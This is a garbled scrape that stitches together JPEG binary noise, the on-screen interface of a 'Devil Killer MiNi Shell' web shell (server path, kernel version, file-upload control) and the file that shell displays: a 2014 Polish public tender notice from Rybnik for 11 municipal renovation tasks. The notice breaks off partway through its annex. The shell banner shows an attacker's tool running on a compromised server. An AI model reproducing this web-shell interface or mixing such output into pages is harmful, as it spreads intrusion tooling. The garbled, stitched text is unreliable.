JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20141013/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20141013/338888-N-2014.html

<p class="kh_header"><b>Rybnik: Roboty remontowe i inwestycyjne na terenie placówek miejskich, z podziałem na zadania (11 zadań)</b><br>
<b>Numer ogłoszenia: 338888 - 2014; data zamieszczenia: 13.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Rybnik , ul. B. Chrobrego 2, 44-200 Rybnik, woj. śląskie, tel. 032 4223011, faks 032 4224124.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rybnik.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty remontowe i inwestycyjne na terenie placówek miejskich, z podziałem na zadania (11 zadań).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty remontowe i inwestycyjne na terenie placówek miejskich, z podziałem na zadania:

zad. 1: Teren sportowo-rekreacyjny MOSiR w dzielnicy Kamień; wymiana części ogrodzenia terenu wzdłuż ul. Hotelowej.
Zakres robót:
- rozbiórka fragmentu istniejącego ogrodzenia zewnętrznego (z przęseł stalowych na podmurówce ceglanej) - skorodowanego i zużytego technicznie, od strony: południowo-wschodniej obiektu, wzdłuż ulicy Hotelowej, na odcinku: od wejścia głównego na teren Ośrodka - do końca (ogrodzenia) zaplecza technicznego MOSiR (tj. do granicy z prywatną posesją przy ul. Hotelowej),
- rozbiórka murowanych z kamienia pylonów wjazdowych przy bramie do zaplecza technicznego MOSiR,
- rozbiórka zdewastowanej stalowej bramy wjazdowej do zaplecza technicznego MOSiR (wjazd gospodarczy), 
- wykonanie nowego ogrodzenia o wysokości 2,0m na słupkach stalowych w gruncie z deską cokołową (podwaliną żelbetową) dołem i z wypełnieniem panelem z prętów zgrzewanych ze wzmocnieniem poziomym,
- ułożenie - obustronnej, wzdłuż ogrodzenia - opaski żwirowej na podłożu wzmocnionym geowłókniną z uzupełnieniem korytowania po rozbiórce starego ogrodzenia i ze splantowaniem przyległego pasa terenu, 
- zabudowanie nowej bramy wjazdowej na teren gospodarczy (techniczny) MOSiR, rozwieranej o konstrukcji stalowej, z wypełnieniem panelem z prętów zgrzewanych (jak ogrodzenie) wraz z uzupełnieniem kostką brukową betonową ubytków w nawierzchni wjazdu po robotach rozbiórkowych (w tym po rozbiórce pylonów jw.),
- wywóz i utylizacja gruzu i odpadów z rozbiórek,
- pełna obsługa geodezyjna robót - w tym inwentaryzacja geodezyjna powykonawcza nowego ogrodzenia.

zad. 2: Ochotnicza Straż Pożarna w dzielnicy Chwałowice; remont sanitariatu.
Zakres robót:
- roboty demontażowe (wykucie ościeżnic drzwiowych, demontaż armatury i instalacji wewnętrznych, rozbiórka ścianek działowych, odbicie okładzin z płytek, skucie posadzki, przebicie otworu drzwiowego),
- usunięcie, wywóz i utylizacja materiałów z rozbiórki,
- wykonanie wylewki cementowej na posadzce,
- uzupełnienie tynków,
- wykonanie ścianek działowych oraz sufitu podwieszanego z płyt G-K na ruszcie stalowym;
- wykonanie nowej instalacji elektrycznej i wod-kan.

zad. 3:	Ochotnicza Straż Pożarna w dzielnicy Kłokocin; remont posadzki sali wielofunkcyjnej i schodów zewnętrznych.
Zakres robót:
- demontaż podłogi z paneli laminowanych oraz cokolików,
- częściowa wymiana deszczułek,
- cyklinowanie i lakierowanie parkietu,
- montaż cokolików,
- skucie stopni schodów zewnętrznych,
- wykonanie szalunku, zbrojenie siatką oraz betonowanie biegu schodowego i spocznika,
- przebudowa i malowanie balustrady,
- wykonanie okładziny schodów i podestu płytek ceramicznych.

zad. 4: 	Plac integracyjny przy ul. Krzywej w dzielnicy Zebrzydowice; zagospodarowanie terenu.
Zakres robót:
- niwelowanie terenu,
- korytowanie,
- wykonanie nawierzchni z łupka przepalonego,
- częściowe humusowanie placu i zasianie trawy,
- budowa ogrodzenia z siatki powłokowanej na słupkach stalowych,
- dostawa i montaż elementów małej architektury (m.in. ławki, stojak do rowerów, kosze na śmieci),
- uporządkowanie terenu,
- inwentaryzacja geodezyjna powykonawcza.

zad. 5: 	Powiatowe Centrum Zarządzania Kryzysowego w dzielnicy Śródmieście; wymiana wykładziny podłogowej w pomieszczeniu socjalnym.
Zakres robót:
- zerwanie istniejącej wykładziny,
- uzupełnienie wylewki i tynków,
- wykonanie wylewki samopoziomującej,
- ułożenie nowej wykładziny rulonowej PVC wraz z montażem cokolików.

zad. 6:	Powiatowe Centrum Zarządzania Kryzysowego w dzielnicy Śródmieście; renowacja drewnianych stopni w klatce schodowej.
Zakres robót:
- demontaż stopni schodowych
-  cyklinowanie stopni i podestów,
- lakierowanie,
- ponowny montaż stopni.

zad. 7:	Kryta Pływalnia i hala sportowa MOSiR w dzielnicy Śródmieście; renowacja parkietu hali oraz przebudowa szatni w holu głównym.
Zakres robót:
- inwentaryzacja linii pół gry,
- demontaż drabinek gimnastycznych, obudów grzejników, kratek wentylacyjnych w posadzce oraz cokolików,
- cyklinowanie i lakierowanie parkietu hali sportowej, 
- odtworzenie linii pól gry zgodnie z obecną, zinwentaryzowaną geometrią,
- roboty rozbiórkowe w szatni w holu głównym (blat podawczy, ścianka podblatowa, boazeria z paneli PVC, stalowa konstrukcja wieszaków, stolarka drzwiowa, wykładzina podłogowa, wylewka cementowa),
- zamurowanie otworu drzwiowego,
- uzupełnienie tynków,
- wykonanie nowej wylewki cementowej,
- wykonanie posadzki z płytek ceramicznych,
- roboty malarskie,
- dostawa i montaż szafek ubraniowych z laminatu HPL (wymiar pojedynczej szafki: szerokość 30 cm, głębokość 50 cm, wysokość 80 cm) zakres dostawy obejmuje 10 szafek pojedynczych i 20 szafek podwójnych (w układzie pionowym o wysokości 1,6 m); łącznie 50 boksów; zarówno szafki pojedyncze jak i podwójne na regulowanych stopkach; zamki z kluczykiem i mechanizmem wrzutowym na monetę o nominale 2 zł.

zad. 8:	Zespół Szkolno-Przedszkolny nr 8 (Przedszkole nr 19) w dzielnicy Boguszowice Osiedle; remont elementów małej architektury przy budynku.
Zakres robót:
- roboty demontażowe (demontaż balustrad, skucie schodów zewnętrznych, rozbiórka opasek,
demontaż krat studzienek doświetlających, rozbiórka koron betonowych studzienek doświetlających, rozbiórka bramy ogrodzeniowej, rozbiórka muru oporowego przy zejściu do kotłowni, częściowy demontaż nawierzchni z płyt drogowych),
- roboty ziemne związane z odtworzeniem muru oporowego przy zejściu do kotłowni oraz wykonaniem fundamentów pod murki przy wejściach,
- szalowanie, zbrojenie i betonowanie muru oporowego i murków przy wejściach (należy zastosować szalunki systemowe o jednorodnej fakturze w celu uzyskania powierzchni pozwalającej na wykończenie tylko w formie malowania),
- rozbiórka nawierzchni z płyt chodnikowych i korytowanie pod wykonanie nowej nawierzchni,
- założenie obrzeży betonowych,
- wykonanie opaski żwirowej wokół budynku,
- częściowa wymiana nawierzchni chodników (bruk betonowy gr. 6 cm) wraz z formowaniem stopni schodowych z krawężników betonowych,
- dostawa ziemi żyznej wraz z jej rozplantowaniem,
- założenie trawników siewem,
- uzupełnienie izolacji termicznej wraz z tynkiem,
- malowanie cokołu,
- inwentaryzacja geodezyjna powykonawcza.

zad. 9:	Dom Kultury w dzielnicy Boguszowice Osiedle; remont pokrycia dachu nad widownią oraz izolacja przewodów wentylacyjnych.
Zakres robót:
- rozbiórka kominów wraz z zabetonowaniem w poziomie stropu nieczynnych kanałów,
- demontaż wpustów dachowych,
- przycięcie izolacji termicznej i wykonanie obróbki koryt zlewowych z blachy stalowej ocynkowanej,
- wykonanie wstępnego krycia koryt z papy termozgrzewalnej oraz założenie i uszczelnienie wpustów dachowych,
- założenie geowłókniny separującej warstwy pokrycia,
- montaż kominków wentylacyjnych pokrycia dachu,
- wykonanie pokrycia dachu i ścianek attykowych z membrany dachowej PVC,
- montaż listew dociskowych na ściankach attykowych,
- izolacja kanału wentylacyjnego płytami z hydrofobizowanej wełny mineralnej wraz z obudową z blachy stalowej ocynkowanej.

zad. 10:	Ośrodek Interwencji Kryzysowej i Psychoterapii w dzielnicy Śródmieście; remont dachu (wymiana skorodowanych elementów konstrukcji więźby, wymiana pokrycia i obróbek blacharskich).
Zakres robót:
- demontaż rynien i obróbek blacharskich,
- naprawa tynków kominów,
- wymiana skorodowanych biologicznie elementów konstrukcji więźby dachowej,
- montaż wyłazu dachowego,
- założenie nowych obróbek blacharskich i rynien,
- wykonanie pokrycia dachu z 2 warstw papy termozgrzewalnej,
- demontaż i ponowny montaż instalacji piorunochronnej.

zad. 11:	Powiatowy Zespół ds. Orzekania o Niepełnosprawności w dzielnicy Śródmieście; remont podjazdu dla niepełnosprawnych.
Zakres robót:
- rozbiórka istniejącego podjazdu,
- wykonanie szalunków oraz zbrojenie i betonowanie nowych murków,
- formowanie podbudowy podjazdu,
- wykonanie nowej nawierzchni z bruku betonowego,
- montaż balustrad.

Szczegółowy zakres prac precyzują przedmiary robót, specyfikacje techniczne wykonania i odbioru robót. Załącznik do SIWZ stanowią rysunki poglądowe.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.43.00.00-0, 45.43.10.00-7, 45.43.21.11-5, 45.43.21.14-6, 45.44.21.00-8, 45.31.00.00-3, 45.33.00.00-9, 45.26.19.00-3, 45.11.13.00-1, 45.11.12.91-4, 45.26.23.10-7, 45.26.23.00-4, 45.23.32.00-1, 45.34.20.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 11.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Wykonawca wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, co najmniej 3 roboty ogólnobudowlane, każda z nich o wartości co najmniej 30.000,00 zł brutto (dotyczy zadań: 1, 4, 7 i 10).
- Wykonawca wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, co najmniej 3 roboty ogólnobudowlane, każda z nich o wartości co najmniej 15.000,00 zł brutto (dotyczy zadania 2).
- Wykonawca wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, co najmniej 3 roboty ogólnobudowlane, każda z nich o wartości co najmniej 10.000,00 zł brutto (dotyczy zadania 3).
- Wykonawca wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, co najmniej 3 roboty ogólnobudowlane, każda z nich o wartości co najmniej 50.000,00 zł brutto (dotyczy zadania 8).
- Wykonawca wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, co najmniej 3 roboty ogólnobudowlane, każda z nich o wartości co najmniej 20.000,00 zł brutto (dotyczy zadania 9).
- Wykonawca wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, co najmniej 3 roboty ogólnobudowlane, każda z nich o wartości co najmniej 5.000,00 zł brutto (dotyczy zadania 11)
W przypadku inwestycji, których wartość została wyrażona w umowie w innej walucie niż PLN należy dokonać przeliczenia tej waluty na PLN przy zastosowaniu średniego kursu NBP na dzień zakończenia inwestycji (w przypadku inwestycji rozliczanych wyłącznie w walutach innych niż PLN).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy (załącznik nr 1 do SIWZ).
Pełnomocnictwo do podpisania oferty (oryginał lub kopia potwierdzona za zgodność z oryginałem przez notariusza) względnie do podpisania innych dokumentów składanych wraz z ofertą, o ile prawo do ich podpisania nie wynika z innych dokumentów złożonych wraz z ofertą.
Kosztorys.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany umowy w w zakresie zmian wartości wynagrodzenia, o którym mowa w § 7 ust. 1, w przypadku wystąpienia robót dodatkowych, co zostanie poprzedzone sporządzeniem protokołów  konieczności. Wynagrodzenie zostanie zmienione na podstawie aneksu o wartość wynikającą z protokołów konieczności. (dotyczy wszystkich zadań)</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.um.rybnik.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Rybnika, ul. Bolesława Chrobrego 2, Wydział Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.10.2014 godzina 09:00, miejsce: Urząd Miasta Rybnika, ul. Bolesława Chrobrego 2, pok. 302.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Termin realizacji zadania 7: od 31.01.2015 r. do 13.02.2015 r..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Teren sportowo-rekreacyjny MOSiR w dzielnicy Kamień; wymiana części ogrodzenia terenu wzdłuż ul. Hotelowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Teren sportowo-rekreacyjny MOSiR w dzielnicy Kamień; wymiana części ogrodzenia terenu wzdłuż ul. Hotelowej.
Zakres robót:
- rozbiórka fragmentu istniejącego ogrodzenia zewnętrznego (z przęseł stalowych na podmurówce ceglanej) - skorodowanego i zużytego technicznie, od strony: południowo-wschodniej obiektu, wzdłuż ulicy Hotelowej, na odcinku: od wejścia głównego na teren Ośrodka - do końca (ogrodzenia) zaplecza technicznego MOSiR (tj. do granicy z prywatną posesją przy ul. Hotelowej),
- rozbiórka murowanych z kamienia (pylonów) wjazdowych przy bramie do zaplecza technicznego MOSiR,
- rozbiórka zdewastowanej stalowej bramy wjazdowej do zaplecza technicznego MOSiR (wjazd gospodarczy), 
- wykonanie nowego ogrodzenia o wysokości 2,0m na słupkach stalowych w gruncie z deską cokołową (podwaliną żelbetową) dołem i z wypełnieniem panelem z prętów zgrzewanych ze wzmocnieniem poziomym,
- ułożenie - obustronnej, wzdłuż ogrodzenia - opaski żwirowej na podłożu wzmocnionym geowłókniną z uzupełnieniem korytowania po rozbiórce starego ogrodzenia i ze splantowaniem przyległego pasa terenu, 
- zabudowanie nowej bramy wjazdowej na teren gospodarczy (techniczny) MOSiR, rozwieranej o konstrukcji stalowej, z wypełnieniem panelem z prętów zgrzewanych (jak ogrodzenie) wraz z uzupełnieniem kostką brukową betonową ubytków w nawierzchni wjazdu po robotach rozbiórkowych (w tym po rozbiórce pylonów jw.),
- wywóz i utylizacja gruzu i odpadów z rozbiórek,
- pełna obsługa geodezyjna robót - w tym inwentaryzacja geodezyjna powykonawcza nowego ogrodzenia.

Szczegółowy zakres prac precyzują przedmiary robót, specyfikacje techniczne wykonania i odbioru robót. Załącznik do SIWZ stanowią rysunki poglądowe.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.11.13.00-1, 45.34.20.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 56.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Ochotnicza Straż Pożarna w dzielnicy Chwałowice; remont sanitariatu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ochotnicza Straż Pożarna w dzielnicy Chwałowice; remont sanitariatu.
Zakres robót:
- roboty demontażowe (wykucie ościeżnic drzwiowych, demontaż armatury i instalacji wewnętrznych, rozbiórka ścianek działowych, odbicie okładzin z płytek, skucie posadzki, przebicie otworu drzwiowego),
- usunięcie, wywóz i utylizacja materiałów z rozbiórki,
- wykonanie wylewki cementowej na posadzce,
- uzupełnienie tynków,
- wykonanie ścianek działowych oraz sufitu podwieszanego z płyt G-K na ruszcie stalowym;
- wykonanie nowej instalacji elektrycznej i wod-kan.

Szczegółowy zakres prac precyzują przedmiary robót, specyfikacje techniczne wykonania i odbioru robót. Załącznik do SIWZ stanowią rysunki poglądowe.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.43.00.00-0, 45.43.10.00-7, 45.44.21.00-8, 45.31.00.00-3, 45.33.00.00-9, 45.11.13.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Ochotnicza Straż Pożarna w dzielnicy Kłokocin; remont posadzki sali wielofunkcyjnej i schodów zewnętrznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ochotnicza Straż Pożarna w dzielnicy Kłokocin; remont posadzki sali wielofunkcyjnej i schodów zewnętrznych.
Zakres robót:
- demontaż podłogi z paneli laminowanych oraz cokolików,
- częściowa wymiana deszczułek,
- cyklinowanie i lakierowanie parkietu,
- montaż cokolików,
- skucie stopni schodów zewnętrznych,
- wykonanie szalunku, zbrojenie siatką oraz betonowanie biegu schodowego i spocznika,
- przebudowa i malowanie balustrady,
- wykonanie okładziny schodów i podestu płytek ceramicznych.

Szczegółowy zakres prac precyzują przedmiary robót, specyfikacje techniczne wykonania i odbioru robót. Załącznik do SIWZ stanowią rysunki poglądowe.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.43.00.00-0, 45.43.10.00-7, 45.43.21.14-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Plac integracyjny przy ul. Krzywej w dzielnicy Zebrzydowice; zagospodarowanie terenu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Plac integracyjny przy ul. Krzywej w dzielnicy Zebrzydowice; zagospodarowanie terenu.
Zakres robót:
- niwelowanie terenu,
- korytowanie,
- wykonanie nawierzchni z łupka przepalonego,
- częściowe humusowanie placu i zasianie trawy,
- budowa ogrodzenia z siatki powłokowanej na słupkach stalowych,
- dostawa i montaż elementów małej architektury (m.in. ławki, stojak do rowerów, kosze na śmieci),
- uporządkowanie terenu,
- inwentaryzacja geodezyjna powykonawcza.

Szczegółowy zakres prac precyzują przedmiary robót, specyfikacje techniczne wykonania i odbioru robót. Załącznik do SIWZ stanowią rysunki poglądowe..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.91-4, 45.23.32.00-1, 45.34.20.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 56.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Powiatowe Centrum Zarządzania Kryzysowego w dzielnicy Śródmieście; wymiana wykładziny podłogowej w pomieszczeniu socjalnym.</p>
